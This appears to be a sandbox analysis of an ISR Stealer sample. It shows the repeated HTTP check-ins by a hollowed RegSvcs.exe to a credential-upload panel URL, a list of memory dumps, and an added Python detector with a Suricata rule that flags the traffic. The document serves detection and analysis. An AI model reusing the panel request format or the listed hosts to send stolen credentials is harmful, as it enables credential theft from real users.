                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:39:32 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 06701732aa0000fa1c3a8dc000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d27caac03fa1c-AMS
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:39:56 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • flag-unknown
                                                    GET
                                                    https://www.000webhost.com/migrate?static=true
                                                    RegSvcs.exe
                                                    Remote address:
                                                    104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:39:57 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 06701793b70000d8b12a845000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d2865fe77d8b1-AMS
                                                  • flag-unknown
                                                    GET
                                                    http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    RegSvcs.exe
                                                    Remote address:
                                                    153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:40:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • GET https://www.000webhost.com/migrate?static=true
                                                    Process: RegSvcs.exe
                                                    Remote address: 104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:40:10 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 067017c68b0000c8374498c000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d28b74f5ec837-AMS
                                                  • GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    Process: RegSvcs.exe
                                                    Remote address: 153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:40:24 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • GET https://www.000webhost.com/migrate?static=true
                                                    Process: RegSvcs.exe
                                                    Remote address: 104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:40:24 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 067018001400000c81dc2c5000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d29135d240c81-AMS
                                                  • GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename=
                                                    Process: RegSvcs.exe
                                                    Remote address: 153.92.0.100:80
                                                    Request
                                                    GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.maga.site88.net
                                                    Response
                                                    HTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Mon, 16 Nov 2020 00:40:37 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: keep-alive
                                                    Location: https://www.000webhost.com/migrate?static=true
                                                    X-Frame-Options: sameorigin
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                  • GET https://www.000webhost.com/migrate?static=true
                                                    Process: RegSvcs.exe
                                                    Remote address: 104.18.107.8:443
                                                    Request
                                                    GET /migrate?static=true HTTP/1.1
                                                    User-Agent: HardCore Software For : Public
                                                    Host: www.000webhost.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cfduid=df0797842a1a9ba9881aaef87fae765061605487108
                                                    Response
                                                    HTTP/1.1 403 Forbidden
                                                    Date: Mon, 16 Nov 2020 00:40:37 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 16
                                                    Connection: keep-alive
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    cf-request-id: 067018318100001f907c83a000000001
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Server: cloudflare
                                                    CF-RAY: 5f2d29626d741f90-AMS
                                                  Connections, in order (remote address, protocol, process; bytes and packets sent / received; request → response status):

                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 488 B / 7 pkts    recv 1.2kB / 5 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 960 B / 10 pkts   recv 7.3kB / 12 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 442 B / 6 pkts    recv 1.1kB / 4 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 1.0kB / 10 pkts   recv 6.9kB / 11 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 438 B / 6 pkts    recv 1.1kB / 4 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 1.0kB / 10 pkts   recv 7.0kB / 12 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 390 B / 5 pkts    recv 603 B / 3 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 968 B / 9 pkts    recv 6.9kB / 11 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 438 B / 6 pkts    recv 1.1kB / 4 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 1.0kB / 10 pkts   recv 7.0kB / 12 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 442 B / 6 pkts    recv 1.1kB / 4 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 1.0kB / 10 pkts   recv 7.0kB / 12 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 438 B / 6 pkts    recv 1.1kB / 4 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 966 B / 9 pkts    recv 6.2kB / 10 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 390 B / 5 pkts    recv 603 B / 3 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 972 B / 9 pkts    recv 6.9kB / 11 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 438 B / 6 pkts    recv 1.1kB / 4 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 972 B / 9 pkts    recv 6.9kB / 11 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403
                                                  • 153.92.0.100:80    http        RegSvcs.exe   sent 442 B / 6 pkts    recv 1.1kB / 4 pkts
                                                    GET http://www.maga.site88.net/index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= → 301
                                                  • 104.18.107.8:443   tls, http   RegSvcs.exe   sent 972 B / 9 pkts    recv 6.9kB / 11 pkts
                                                    GET https://www.000webhost.com/migrate?static=true → 403

                                                  DNS (resolver 8.8.8.8:53; bytes and packets sent / received; query → answer):

                                                  • 8.8.8.8:53   dns   sent 65 B / 1 pkt   recv 81 B / 1 pkt
                                                    www.maga.site88.net → 153.92.0.100
                                                  • 8.8.8.8:53   dns   sent 64 B / 1 pkt   recv 96 B / 1 pkt
                                                    www.000webhost.com → 104.18.107.8, 104.18.108.8
                                                  • 8.8.8.8:53   dns   sent 76 B / 1 pkt   recv 325 B / 1 pkt
                                                    www.download.windowsupdate.com → 72.21.81.240
                                                  • 8.8.8.8:53   dns   sent 62 B / 1 pkt   recv 146 B / 1 pkt
                                                    crl.verisign.com → 93.184.220.29

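                                                  The check-ins above are the ISR Stealer client reporting to its panel: every request from the hollowed RegSvcs.exe carries the fixed User-Agent "HardCore Software For : Public" and hits index.php?action=add with the parameters username, password, app, pcname and sitename, all empty here except pcname=EIDQHRRL. In this run the site88.net host answers each check-in with a 301 to the 000webhost migration page, which returns 403, so nothing reached an operator; the three dated requests show the client retrying 13 to 15 seconds apart. The following Python detector is an added example written for this report, not part of the sandbox output: it parses raw request records of the shape shown above, flags the client by its User-Agent and by the panel's parameter set, extracts pcname and any captured credentials, and emits a Suricata signature built from the same fields (written here, not taken from any ruleset). The log records are constructed: three mirror the report, the credential-bearing record is hypothetical, and the crl.verisign.com fetch is a constructed benign request that must not be flagged.

```python
"""Detect ISR Stealer (Hackhound-derived) check-ins in HTTP request logs.

Added example for this report; it is not part of the sandbox output. The
sample records are constructed: three mirror the requests in the report, one
adds hypothetical captured credentials, one is benign CRL traffic.
"""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Hard-coded client User-Agent seen in every request from RegSvcs.exe in the report.
ISR_USER_AGENT = "HardCore Software For : Public"
# Query parameters of the panel's record-adding endpoint (index.php?action=add).
ISR_PARAMS = {"action", "username", "password", "app", "pcname", "sitename"}


@dataclass
class Hit:
    kind: str            # "exfil" (panel endpoint) or "ua-only" (same client, other URL)
    process: str
    host: str
    remote: str
    status: Optional[int]
    pcname: str = ""
    app: str = ""
    username: str = ""
    has_credentials: bool = False


# Constructed log: (process, remote address, raw request, response status).
SAMPLE_LOG = [
    ("RegSvcs.exe", "153.92.0.100:80",
     "GET /index.php?action=add&username=&password=&app=&pcname=EIDQHRRL&sitename= HTTP/1.1\r\n"
     "User-Agent: HardCore Software For : Public\r\n"
     "Host: www.maga.site88.net\r\n\r\n", 301),
    ("RegSvcs.exe", "104.18.107.8:443",
     "GET /migrate?static=true HTTP/1.1\r\n"
     "User-Agent: HardCore Software For : Public\r\n"
     "Host: www.000webhost.com\r\n"
     "Connection: Keep-Alive\r\n\r\n", 403),
    # Hypothetical: what a successful credential upload would look like.
    ("RegSvcs.exe", "153.92.0.100:80",
     "GET /index.php?action=add&username=alice%40example.org&password=hunter2"
     "&app=Outlook&pcname=EIDQHRRL&sitename=mail.example.org HTTP/1.1\r\n"
     "User-Agent: HardCore Software For : Public\r\n"
     "Host: www.maga.site88.net\r\n\r\n", 200),
    # Benign Windows CRL fetch (constructed); must not be flagged.
    ("svchost.exe", "93.184.220.29:80",
     "GET /pca3-g5.crl HTTP/1.1\r\n"
     "User-Agent: Microsoft-CryptoAPI/6.1\r\n"
     "Host: crl.verisign.com\r\n\r\n", 200),
]


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(process: str, remote: str, raw: str, status: Optional[int]) -> Optional[Hit]:
    """Return a Hit for ISR Stealer traffic, None for anything else."""
    method, target, headers = parse_request(raw)
    if headers.get("user-agent") != ISR_USER_AGENT:
        return None
    host = headers.get("host", "")
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if method != "GET" or not ISR_PARAMS.issubset(query):
        # Same client, but not the panel endpoint (e.g. a followed redirect).
        return Hit("ua-only", process, host, remote, status)
    username = query["username"][0]
    password = query["password"][0]
    return Hit("exfil", process, host, remote, status,
               pcname=query["pcname"][0], app=query["app"][0],
               username=username, has_credentials=bool(username or password))


def scan(log) -> list:
    """Run classify() over (process, remote, raw, status) records, keeping hits."""
    return [h for h in (classify(*rec) for rec in log) if h is not None]


def suricata_rule(sid: int) -> str:
    """Suricata 5+ signature for the panel check-in, built from the same fields."""
    return ('alert http $HOME_NET any -> $EXTERNAL_NET any ('
            'msg:"ISR Stealer credential upload"; flow:established,to_server; '
            f'http.user_agent; content:"{ISR_USER_AGENT}"; '
            'http.uri; content:"action=add"; content:"&pcname="; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(suricata_rule(9000001))
```

                                                  The User-Agent alone is enough to flag the client, which is why the 000webhost redirect target is still reported (as "ua-only"); the parameter check separates actual panel check-ins, where the username/password fields tell you whether anything was taken. The sticky-buffer syntax (http.user_agent, http.uri) needs Suricata 5 or later; Snort 2.9 uses the http_user_agent and http_uri content modifiers instead.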
                                                  MITRE ATT&CK Enterprise v6

Downloads

Memory dumps captured during the run (process ID, event index, address range, and file size):

• memory/320-228-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/320-227-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/320-226-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/400-9-0x0000000000400000-0x0000000000442000-memory.dmp  Filesize: 264KB
• memory/688-40-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/688-41-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/688-42-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/852-129-0x0000000002910000-0x0000000002914000-memory.dmp  Filesize: 16KB
• memory/948-101-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/948-100-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1016-198-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1016-200-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1016-199-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1092-218-0x0000000002910000-0x0000000002914000-memory.dmp  Filesize: 16KB
• memory/1124-14-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1124-17-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1124-16-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1124-18-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1160-234-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1160-235-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1188-240-0x0000000002820000-0x0000000002824000-memory.dmp  Filesize: 16KB
• memory/1212-260-0x0000000002730000-0x0000000002734000-memory.dmp  Filesize: 16KB
• memory/1220-190-0x0000000002710000-0x0000000002714000-memory.dmp  Filesize: 16KB
• memory/1224-71-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1224-212-0x00000000029D0000-0x00000000029D4000-memory.dmp  Filesize: 16KB
• memory/1224-166-0x00000000027F0000-0x00000000027F4000-memory.dmp  Filesize: 16KB
• memory/1224-70-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1224-72-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1336-116-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1336-114-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1336-115-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1340-94-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1340-93-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1340-151-0x0000000002810000-0x0000000002814000-memory.dmp  Filesize: 16KB
• memory/1340-92-0x0000000000400000-0x0000000000453000-memory.dmp  Filesize: 332KB
• memory/1572-62-0x0000000002630000-0x0000000002634000-memory.dmp  Filesize: 16KB
• memory/1756-184-0x0000000002FD0000-0x0000000002FD1000-memory.dmp  Filesize: 4KB
• memory/1884-57-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1884-84-0x0000000002750000-0x0000000002754000-memory.dmp  Filesize: 16KB
• memory/1884-56-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1884-55-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1912-79-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1912-78-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1912-77-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/1944-20-0x000007FEF7A50000-0x000007FEF7CCA000-memory.dmp  Filesize: 2.5MB
• memory/1964-106-0x00000000028E0000-0x00000000028E4000-memory.dmp  Filesize: 16KB
• memory/2004-32-0x00000000027B0000-0x00000000027B4000-memory.dmp  Filesize: 16KB
• memory/2016-23-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/2016-21-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/2016-24-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/2016-25-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/2044-122-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
• memory/2044-123-0x0000000000400000-0x000000000041F000-memory.dmp  Filesize: 124KB
